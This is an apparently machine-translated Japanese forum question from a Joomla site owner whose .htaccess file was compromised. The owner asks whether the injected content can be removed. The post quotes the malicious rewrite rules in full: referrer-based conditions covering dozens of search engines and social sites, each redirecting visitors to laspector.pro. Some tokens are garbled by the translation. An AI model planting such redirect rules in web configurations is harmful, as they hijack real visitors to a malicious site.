ここでアドバイスを求めます。
Joomla の (古いバージョン) に基づいた Web サイトとフォーラムを運営しています。マルウェアがサイトに存在するという警告をユーザーがアンチウイルス ソフトウェアから受け取り始める週末までの 4 年間、すべてが順調でした。
Google ウェブマスター ツールを実行したところ、.htaccess ファイルにマルウェアが存在することが示されました。
案の定、マルウェア レポートが開始された朝に .htaccess ファイルが実際に更新されたことがわかります。私はこれが珍しいことではないことを示唆するいくつかの他の q をここで読みました......... また、.ht アクセス ファイルが必要である場合と必要でない場合があるといういくつかの提案も読みました。
私が見つけたのはこれでした:
RewriteCond %{HTTP_REFERER} ^ の RewriteEngine
。(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog |live|myspace|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|ウェブ全体|amfibi|dmoz|yippy|検索|walhello|webcrawler|jayde|findwhat |teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|thatbot|acoon |cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|そのようなアーカイブ|そのようなビーネ|そのマシン|ウェブアーカイブ|infospace).(. )
RewriteRule ^(.*)$ http://laspector.pro/cyrculate?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfor|hispavista|passagen|spray|eniro|telia |bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut |the-arena|thisisouryear|ukkey|uwe|再会した友達|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden |confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(. )
RewriteRule ^(.*)$ http://laspector.pro/cyrculate?8 [R=301,L]
/IfModule>
マルウェア チェックが参照した特定の項目は Laspector でした。
だから、私の質問はこれらです:
- .htaccess ファイルの .content またはそのサブセットを安全に削除できますか?
- .htaccess ファイルも必要ですか?
Web サイトはオープン アクセス (サインインは不要) で、フォーラムには登録とサインインが必要です (該当する場合)。
誰でも提供できるアドバイスをありがとう。